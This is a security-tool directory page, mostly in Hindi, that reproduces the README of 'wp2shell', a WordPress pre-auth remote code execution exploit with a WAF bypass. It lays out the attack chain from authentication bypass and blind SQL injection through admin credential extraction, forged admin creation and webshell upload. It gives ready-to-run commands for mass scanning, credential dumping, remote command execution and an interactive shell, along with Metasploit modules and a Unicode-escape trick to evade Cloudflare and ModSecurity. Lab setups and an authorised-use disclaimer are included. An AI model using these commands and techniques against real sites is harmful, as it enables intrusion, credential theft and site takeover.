Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
wp2shell-Exploit-Waf-Bypass — वर्डप्रेस प्री-ऑथ RCE एक्सप्लॉइट + स्कैनर + WAF बाईपास | CVE-2026-63030 + CVE-2026-60137 | Go + Python + Metasploit मॉड्यूल + Docker लैब | Kitploit
उपकरण/GitHubGitHub/m4xsec/wp2shell-exploit-waf-bypass
वेब भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणएपीआई सुरक्षा परीक्षणWAF बाईपासपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubm4xsec/wp2shell-exploit-waf-bypass

wp2shell-Exploit-Waf-Bypass

वर्डप्रेस प्री-ऑथ RCE एक्सप्लॉइट + स्कैनर + WAF बाईपास | CVE-2026-63030 + CVE-2026-60137 | Go + Python + Metasploit मॉड्यूल + Docker लैब

रिपॉजिटरी देखें
2121 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
root@kitploit:~
                ___      __         ___
 _      _____  |__ \ ___/ /_  ___  / / /
| | /| / / _ \ __/ // __/ __ \/ _ \/ / / 
| |/ |/ /  __// __//_  / / / /  __/ / /  
|__/|__/\___//____//__/_/ /_/\___/_/_/   
                                         
  WordPress Pre-Auth RCE — CVE-2026-63030 + CVE-2026-60137
  Venexy (M4xSec) द्वारा

GitHub Release License: MIT Go Metasploit

WordPress 6.8.0–6.8.5, 6.9.0–6.9.4, 7.0.0–7.0.1 पर अप्रमाणित रिमोट कोड निष्पादन। 6.8.6, 6.9.5, 7.0.2 में पैच किया गया।

त्वरित स्थापना

root@kitploit:~
# Pre-compiled binary (fastest)
curl -sL https://github.com/M4xSec/wp2shell-Exploit-Waf-Bypass/releases/download/v1.0.0/wp2shell-linux-amd64 -o wp2shell && chmod +x wp2shell

# Or build from source
go build -o wp2shell go-scanner/wp2shell-master.go

हमला श्रृंखला

  1. अमान्य primer पथ के साथ नेस्टेड बैच अनुरोधों के माध्यम से रूट कन्फ्यूज़न प्रमाणीकरण को बायपास करता है
  2. समय-आधारित ब्लाइंड SQLi तालिका उपसर्ग, एडमिन आईडी और क्रेडेंशियल्स निकालता है
  3. UNION-आधारित पंक्ति जालसाजी oEmbed कैश को सीड करती है (केवल-पठनीय SQLi → DB लेखन)
  4. Changeset उन्नयन + री-एंट्रेंट parse_request() एक जाली व्यवस्थापक बनाता है
  5. प्लगइन अपलोड एक स्व-सफाई वेबशेल तैनात करता है
  6. कमांड निष्पादन और स्वचालित सफाई

उपकरण

Go स्कैनर (go-scanner/wp2shell-master.go)

एक ही बाइनरी में सब कुछ — स्कैन, जाँच, रीड, एक्सप्लॉइट, इंटरैक्टिव शेल।

root@kitploit:~
go build -o wp2shell-master go-scanner/wp2shell-master.go

# Mass scan
./wp2shell-master scan -f targets.txt -j -t 20

# Confirm SQLi
./wp2shell-master check https://target.com --waf --delay 3.0

# Extract admin creds
./wp2shell-master read https://target.com --preset users

# Pre-auth RCE (no password needed)
./wp2shell-master rce https://target.com --cmd id -y --waf --stealth

# Interactive shell
./wp2shell-master rce https://target.com -i -y

WAF बाईपास उपकरण (waf-bypass/)

SQL कीवर्ड्स के JSON यूनिकोड एस्केपिंग के माध्यम से Cloudflare/ModSecurity बाईपास के लिए स्टैंडअलोन स्क्रिप्ट्स।

  • core.py — WAF बाईपास के साथ साझा ब्लाइंड SQLi इंजन
  • dump_version.py — @@version निकालें
  • dump_dbname.py — DATABASE() निकालें
  • dump_tables.py — तालिकाओं को सूचीबद्ध करें
  • dump_columns.py — कॉलमों को सूचीबद्ध करें
  • rce_shell.py — WAF बाईपास के साथ पूर्ण RCE श्रृंखला

Metasploit मॉड्यूल (metasploit-modules/)

  • wp2shell_rce.rb — पूर्ण RCE एक्सप्लॉइट मॉड्यूल (PR #21760)
  • wp2shell_scanner.rb — गैर-विनाशकारी स्कैनर (PR #21761)

स्थानीय रूप से स्थापित करें:

root@kitploit:~
mkdir -p ~/.msf4/modules/exploits/multi/http
mkdir -p ~/.msf4/modules/auxiliary/scanner/http
cp metasploit-modules/wp2shell_rce.rb ~/.msf4/modules/exploits/multi/http/wp_wordpress_batch_rce.rb
cp metasploit-modules/wp2shell_scanner.rb ~/.msf4/modules/auxiliary/scanner/http/wp_wordpress_batch_sqli.rb

WAF बाईपास तकनीक

Cloudflare WAF कच्चे JSON बाइट्स का निरीक्षण करता है, लेकिन पैटर्न मिलान से पहले \uXXXX एस्केप सीक्वेंस को डिकोड नहीं करता। WordPress की PHP json_decode() उन्हें पारदर्शी रूप से डिकोड करती है।

  • SLEEP → SLEEP — कीवर्ड डिटेक्शन को बायपास करता है
  • कोलन primer (: के बजाय http://:) — छोटा, URI पैटर्न नियमों से बचता है
  • /wp-json/batch/v1 permalink पथ — ?rest_route= ब्लॉकिंग से बचता है
  • Origin + Referer हेडर लक्ष्य डोमेन से — CORS/समान-उत्पत्ति जाँच संतुष्ट करता है

डॉकर लैब

No-WAF लैब (पोर्ट 8888)

root@kitploit:~
cd lab
docker compose up -d --build
# WordPress 6.9.0 at http://localhost:8888
# Admin: admin / Summer2026!

WAF लैब (पोर्ट 9999)

Cloudflare-शैली नियमों के साथ ModSecurity CRS (OWASP) — यूनिकोड बाईपास की पुष्टि हुई।

root@kitploit:~
cd lab/waf
docker compose up -d --build
# WordPress behind WAF at http://localhost:9999

अस्वीकरण

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण के लिए है। केवल उन सिस्टम्स पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है। अनधिकृत पहुँच अवैध है।

लाइसेंस

MIT

टूल डाउनलोड करें